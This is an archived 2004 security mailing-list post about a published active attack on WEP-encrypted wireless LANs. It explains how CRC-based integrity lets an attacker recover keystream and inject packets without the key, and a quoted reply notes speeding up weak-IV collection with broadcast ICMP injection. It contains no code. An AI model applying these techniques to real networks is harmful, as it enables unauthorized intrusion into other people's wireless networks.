From: Ivan Arce (ivan.arce@coresecurity.com)
Date: Tue May 11 2004 - 01:49:16 EDT
Nick Petroni and Bill Arbaugh have outlined an active attack that
would give you full access to a WEP encrypted wireless LAN
without knowledge of the secret key.
It relies on the lack of integrity checks for the wireless packets
which lets an attacker inject arbitrary packets into the LAN
without being detected.
The attack does not require you to crack any WEP key and uses
the fact that WEP wrongly uses CRC for integrity checks, this lets
an attacker mount an inductive attack to gradually recover additional
bits of a pseudorandom stream provided that N bytes are initially recovered
with a known plaintext attack. They cite ARP and DHCP requests as effective
for this inital recovery. BTW, you dont really need to *inject* packets
for the inital recovery.
Full description of the attack appeared on:
"The Dangers of Mitigating Security Design Flaws: A Wireless Case Study"
Nick L. Petroni Jr. and William Arbaugh
IEEE Security & Privacy magazine vol1. num 1., January/February 2003
A powerpoint presentation is available at:
http://www.cs.umd.edu/~waa/wepwep2-attack.html
I am unaware of publicly available tools that implement the attack.
This might be old news but I am quite surprised that it is not mentioned as
popular and widely used as passive attacks focused on cracking keys.
-ivan
Joshua Wright wrote:
>
> One IP address always exists on every IP network - 255.255.255.255. I've
> been successful at accelerating weak IV collection by injecting ICMP
> Echo requests to the broadcast address on some networks, I'm sure there
> are plenty of other opportunities without know the network number.
>
> Fun stuff.
>
> -Josh
-- --- To strive, to seek, to find, and not to yield. - Alfred, Lord Tennyson Ulysses,1842 Ivan Arce CTO CORE SECURITY TECHNOLOGIES 46 Farnsworth Street Boston, MA 02210 Ph: 617-399-6980 Fax: 617-399-6987 ivan.arce@coresecurity.com www.coresecurity.com PGP Fingerprint: C7A8 ED85 8D7B 9ADC 6836 B25D 207B E78E 2AD1 F65A ------------------------------------------------------------------------------ Ethical Hacking at the InfoSec Institute. Mention this ad and get $545 off any course! All of our class sizes are guaranteed to be 10 students or less to facilitate one-on-one interaction with one of our expert instructors. Attend a course taught by an expert instructor with years of in-the-field pen testing experience in our state of the art hacking lab. Master the skills of an Ethical Hacker to better assess the security of your organization. Visit us at: http://www.infosecinstitute.com/courses/ethical_hacking_training.html -------------------------------------------------------------------------------
This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:53:53 EDT